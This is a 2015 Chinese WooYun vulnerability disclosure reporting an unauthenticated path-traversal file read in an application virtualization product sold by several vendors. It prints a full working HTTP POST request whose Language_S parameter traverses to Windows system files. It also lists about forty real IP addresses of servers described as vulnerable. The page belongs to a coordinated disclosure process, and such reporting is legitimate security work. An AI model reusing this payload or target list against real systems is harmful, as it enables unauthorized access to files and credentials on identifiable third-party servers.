当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121875

漏洞标题:某应用虚拟化系统任意系统文件读取(无需登录83案例)

相关厂商:cncert国家互联网应急中心

漏洞作者: YY-2012

提交时间:2015-06-24 15:05

修复时间:2015-09-26 07:34

公开时间:2015-09-26 07:34

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-24: 细节已通知厂商并且等待厂商处理中
2015-06-28: 厂商已经确认,细节仅向厂商公开
2015-07-01: 细节向第三方安全合作伙伴开放
2015-08-22: 细节向核心白帽子及相关领域专家公开
2015-09-01: 细节向普通白帽子公开
2015-09-11: 细节向实习白帽子公开
2015-09-26: 细节向公众公开

简要描述:

&通用型敏感信息泄漏
案例中发现四家公司都做是这套系统。

详细说明:

陕西中海知易信息科技有限公司(1案例)
新中航银商科技(北京)有限公司(1案例)
北京科希盟软件有限公司(1案例)
西安新软信息科技有限公司(80案例)
案例中,发现登录页面显示以上四家公司都是做这套系统。
无需登录下任意系统文件遍历,其中西安新软信息科技有限公司的“极通EWEBS应用虚拟化系统”全版本都受影响。

POST /casmain.xgi HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://60.190.163.51:8888/casmain.xgi
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=1e253422a416d6d33b52e2ad79c2c25a; CookieLanguageName=EN
Host: 60.190.163.51:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Language_S=../../../../windows/system32/drivers/etc/hosts


敏感信息泄漏:

http://url/testweb.php

漏洞证明:

aaaaaaaaaaaa11111111111111111.jpg


aaaaaaaaaaaa22222222222222222.jpg


aaaaaaaaaaaa33333333333333.jpg


aaaaaaaaaa4444444444.jpg


aaaaaaaaaaaaa55555555555555.jpg


aaaaaaaaaaa666666666666666.jpg


aaaaaaaaaaaaa7777777777777777777777777.jpg


案例:

http://124.114.140.74:81/
http://120.196.130.114:8000/
http://124.202.231.234:81/
http://211.142.178.202:81/
http://211.149.230.178:81/
http://27.115.92.234:81/
http://1.85.36.198:8888/
http://124.161.38.168:81/
http://122.227.67.42:81/
http://118.114.246.148:81/
http://113.200.157.106:81/
http://122.144.133.100:81/
http://61.155.66.190:8000/
http://221.224.76.43:8080/
http://120.194.21.246:81/
http://59.175.221.130:8888/
http://101.230.10.59:81/
http://180.169.102.149:8888/
http://123.57.0.16:81/
http://101.71.240.118:8080/
http://58.213.122.98:81/
http://113.140.83.194:81/
http://122.144.130.19:81/
http://58.246.120.18:8888/
http://218.30.138.123:81/
http://123.139.46.106:81/
http://218.23.119.190/
http://113.141.27.242/
http://115.29.170.184:8080/
http://124.112.49.193:81/
http://218.242.38.52:8000/
http://112.25.209.185:81/
http://125.73.131.191:81/
http://61.150.93.237:81/
http://222.91.57.81:81/
http://123.139.89.2:81/
http://60.6.218.184:8888/
以上案例都是西安新软信息科技有限公司版权所有
http://113.200.65.114:8002/ 陕西中海知易信息科技有限公司版权所有
http://211.137.125.182/ 新中航银商科技(北京)有限公司
http://60.8.112.134/ 北京科希盟软件有限公司版权所有

修复方案:

联系厂商。

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-06-28 07:34

厂商回复:

最新状态:

暂无